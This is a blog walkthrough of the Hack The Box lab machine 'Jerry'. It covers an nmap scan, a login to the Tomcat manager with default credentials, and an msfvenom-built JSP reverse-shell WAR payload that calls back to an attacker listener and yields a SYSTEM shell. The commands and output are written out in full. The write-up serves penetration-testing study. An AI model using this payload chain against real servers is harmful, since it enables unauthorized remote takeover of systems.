Redhalo

hack the box walkthrough – Jerry machine

First Windows HTB machine for my blog today with probably the easiest one called Jerry.

Let’s jump it !

Enumeration

Again we start our enumeration phase with a nmap scanning on the given IP address:

[email protected]:~/Documents/nmapAutomator$ ./nmapAutomator.sh 10.129.79.3 Full
Running a Full scan on 10.129.79.3
Host is likely running Windows
---------------------Starting Nmap Full Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-10 10:27 EST
Initiating Parallel DNS resolution of 1 host. at 10:27
Completed Parallel DNS resolution of 1 host. at 10:27, 0.03s elapsed
Initiating Connect Scan at 10:27
Scanning 10.129.79.3 [65535 ports]
Discovered open port 8080/tcp on 10.129.79.3
Completed Connect Scan at 10:31, 262.72s elapsed (65535 total ports)
Nmap scan report for 10.129.79.3                                                                                                                   
Host is up (0.044s latency).                                                                                                                       
Not shown: 65534 filtered ports                                                                                                                    
PORT     STATE SERVICE                                                                                                                             
8080/tcp open  http-proxy                                                                                                                          
                                                                                                                                                   
Read data files from: /usr/bin/../share/nmap                                                                                                       
Nmap done: 1 IP address (1 host up) scanned in 262.79 seconds                                                                                      
                                                                                                                                                   
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-10 10:31 EST
Nmap scan report for 10.129.79.3
Host is up (0.046s latency).

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.93 seconds

As you can see I am now getting used with nmapAutomator. It is very convenient and fast.

From the nmap scan result we can read that we are dealing with a Windows Machine and only a tomcat service is listening on port 8080.

Tomcat Access

Few login attempts on the tomcat web application manager gave me access with the combinaison login/password tomcat/s3cret

PRIVILEGE ESCALATION

Since I can deploy new application, I am going to create my reverse shell via a malicious war file.

[email protected]:~/Documents$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.64 LPORT=4242 -f war -o revshell.war
WARN: Unresolved or ambiguous specs during Gem::Specification.reset:
      reline (>= 0)
      Available/installed versions of this gem:
      - 0.1.5
      - 0.1.3
WARN: Clearing out unresolved specs. Try 'gem cleanup '
Please report a bug if this causes problems.
Payload size: 1089 bytes
Final size of war file: 1089 bytes
Saved as: revshell.war

I just need to deploy it from the tomcat web application manager:

Then it is available as application:

I ran my listener:

[email protected]:~/Documents$ nc -lvnp 4242
listening on [any] 4242 ...

And ran the application by accessing it with the URL http://IP:8080/revshell/

The shell spawned with already all rights on the machine:

[email protected]:~/Documents$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.14.64] from (UNKNOWN) [10.129.79.3] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system